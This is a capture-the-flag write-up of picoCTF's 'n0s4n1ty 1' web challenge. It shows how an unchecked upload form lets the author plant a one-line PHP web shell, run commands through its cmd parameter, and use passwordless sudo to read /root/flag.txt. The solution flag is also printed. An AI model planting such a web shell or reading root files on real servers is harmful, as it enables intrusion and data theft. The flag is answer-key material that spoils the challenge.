Bl0ss0mX5 ⚡️

PicoGYM Web Exploitation Writeup | n0s4n1ty 1 | Easy | PicoCTF


easy ctf picoctf web easy-web easy-picoctf-web easy-picoctf picoctf-web

PicoGYM Web Exploitation Writeup | n0s4n1ty 1 | Easy | PicoCTF

Originally posted on my Medium page.

This writeup covers the “n0s4n1ty 1” challenge from picoCTF 2025, authored by Prince Niyonshuti N., under the Web Exploitation category. The challenge revolves around a poorly implemented profile picture upload functionality on a website, which presents an opportunity for exploitation.

After entering the website, I came across a file upload feature.

It was mentioned that the upload is not sanitized — which means it accepts any type of file.
I thought — why not upload a file that can run shell commands on the server?

But before going all in, let’s test the upload functionality first.

Let’s upload a dummy file to see what happens.
When we upload a simple file (like a .txt or an image), the application redirects the uploaded file to the uploads.php path. This tells us where our file ends up and how it might be accessed via URL.

Since there’s no restriction on file types, we can write a simple PHP web shell and upload it.

So, I created a file named shell.php with this content:

<?php system($_GET['cmd']); ?>

It takes whatever value is passed in the URL under the cmd parameter, Runs it as a system command on the server And then prints the output on the web page.

I uploaded the shell.php file successfully.

To run commands, I used the cmd parameter like this:

uploads/shell.php?cmd=whoami

Our goal is to find a hidden flag in the /root directory.

But since normal users can’t access /root, I needed to check if I had sudo privileges. I ran:

uploads/shell.php?cmd=sudo -l

This tells that User www-data (we) can run ANY command as ANY user (including root) without a password

→ Hurray!! This is full sudo access.

Let’s list the files in root with the command:

cmd=sudo ls /root

Finally, I read the flag using:

cmd=sudo cat /root/flag.txt

The flag is: picoCTF{wh47_c4n_u_d0_wPHP_4043cda3}

📖 Want more CTF and OSINT writeups like this? Check out my Medium page here.